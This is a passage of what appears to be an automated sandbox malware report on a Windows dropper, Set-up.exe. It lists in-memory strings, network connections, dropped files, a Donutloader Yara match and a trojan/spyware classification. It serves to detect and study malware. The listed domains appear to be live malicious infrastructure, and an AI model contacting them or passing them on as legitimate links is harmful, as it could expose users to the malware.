              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Set-up.exe, 00000000.00000003.1832991094.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000002.00000002.1903649032.00000000048F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1903649032.00000000048E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txts
              Source: Set-up.exe, 00000000.00000003.1967884896.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1976966783.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1865578405.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820887982.00000000034D6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1832822224.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820837451.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/
              Source: Set-up.exe, 00000000.00000003.1848683758.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/1
              Source: Set-up.exe, Set-up.exe, 00000000.00000003.1967884896.000000000065D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1848702548.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1976966783.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1865578405.0000000000664000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1976966783.0000000000662000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1865578405.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/api
              Source: Set-up.exe, 00000000.00000003.1848702548.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855564211.0000000000674000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/apiD
              Source: Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/apiQ
              Source: Set-up.exe, 00000000.00000003.1832822224.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/apiaFP
              Source: Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/apiay
              Source: Set-up.exe, 00000000.00000002.1976966783.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1865578405.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/apiod
              Source: Set-up.exe, 00000000.00000003.1832822224.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/apipi
              Source: Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/bu
              Source: Set-up.exe, 00000000.00000003.1967884896.000000000066D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs/piw
              Source: Set-up.exe, Set-up.exe, 00000000.00000003.1848702548.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855564211.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cellardesiresso.sbs:443/api
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: https://certs.securetrust.com/CA0
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: https://certs.securetrust.com/CA05
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: https://certs.securetrust.com/CA0:
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Set-up.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: Set-up.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: powershell.exe, 00000002.00000002.1902724955.00000000006FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000002.00000002.1903649032.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=hZ
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org/
              Source: Set-up.exe, 00000000.00000003.1912566496.000000000391C000.00000004.00000800.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000000.1974262864.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org0
              Source: Set-up.exe, 00000000.00000002.1976966783.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt8
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txts;
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: Set-up.exe, 00000000.00000003.1806234531.000000000351E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Set-up.exe, 00000000.00000003.1820986433.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806234531.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820857270.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806355173.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820779277.0000000003515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Set-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Set-up.exe, 00000000.00000003.1820986433.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806234531.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820857270.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806355173.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820779277.0000000003515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Set-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://www.certum.pl/CPS0
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1987192469.000000007EF0B000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1978639470.000000000366F000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000000.1992282981.0000000000EA1000.00000020.00000001.01000000.00000009.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000000.2014920504.0000000000ADD000.00000020.00000001.01000000.0000000C.sdmp, PU6S498VOPMOZVY2Y7.tmp.6.drString found in binary or memory: https://www.innosetup.com/
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1987192469.000000007EF0B000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1978639470.000000000366F000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000000.1992282981.0000000000EA1000.00000020.00000001.01000000.00000009.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000000.2014920504.0000000000ADD000.00000020.00000001.01000000.0000000C.sdmp, PU6S498VOPMOZVY2Y7.tmp.6.drString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Sample or dropped binary is a compiled AutoHotkey binary
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0226575B NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0226575B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221039B0_2_0221039B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0226575B0_2_0226575B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222D2A80_2_0222D2A8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222E2E20_2_0222E2E2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022172E80_2_022172E8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022272E80_2_022272E8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022143580_2_02214358
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022300780_2_02230078
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221B0980_2_0221B098
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222A0E20_2_0222A0E2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022151280_2_02215128
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022181380_2_02218138
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221A1180_2_0221A118
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224515C0_2_0224515C
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022571A80_2_022571A8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022351E80_2_022351E8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224F1E80_2_0224F1E8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022241CA0_2_022241CA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0223B6280_2_0223B628
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224574D0_2_0224574D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022357880_2_02235788
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222F78D0_2_0222F78D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221A7980_2_0221A798
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224A7D80_2_0224A7D8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224E42B0_2_0224E42B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022534380_2_02253438
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022304080_2_02230408
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221D4660_2_0221D466
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0223E4770_2_0223E477
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222C4A80_2_0222C4A8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022574B80_2_022574B8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221C4E80_2_0221C4E8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224A5480_2_0224A548
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222A5CC0_2_0222A5CC
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02224A900_2_02224A90
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02236AC20_2_02236AC2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02215AD80_2_02215AD8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224FB680_2_0224FB68
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02256B780_2_02256B78
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022468320_2_02246832
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022328180_2_02232818
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022308180_2_02230818
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224F8F80_2_0224F8F8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022509680_2_02250968
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022289830_2_02228983
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_022349E80_2_022349E8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222E9C10_2_0222E9C1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224D9C00_2_0224D9C0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02249E300_2_02249E30
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02224EB80_2_02224EB8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02230E980_2_02230E98
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221FEE20_2_0221FEE2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0222AEE80_2_0222AEE8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02256EE80_2_02256EE8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02218F180_2_02218F18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0224EF880_2_0224EF88
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02219C380_2_02219C38
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02230C780_2_02230C78
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0223AC7C0_2_0223AC7C
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02217CA80_2_02217CA8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221ACA80_2_0221ACA8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02233CF80_2_02233CF8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02247D780_2_02247D78
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 022272D8 appears 130 times
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 02219A48 appears 73 times
              Source: Set-up.exeStatic PE information: invalid certificate
              Source: Set-up.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Set-up.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: PU6S498VOPMOZVY2Y7.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: PU6S498VOPMOZVY2Y7.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: PU6S498VOPMOZVY2Y7.tmp.8.drStatic PE information: Number of sections : 11 > 10
              Source: PU6S498VOPMOZVY2Y7.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: PU6S498VOPMOZVY2Y7.tmp.6.drStatic PE information: Number of sections : 11 > 10
              Source: Set-up.exe, 00000000.00000003.1780846179.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-up.exe
              Source: Set-up.exe, 00000000.00000000.1684675006.0000000000520000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1914060510.000000000397B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-up.exe
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/13@3/3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02210AAB CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02210AAB
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
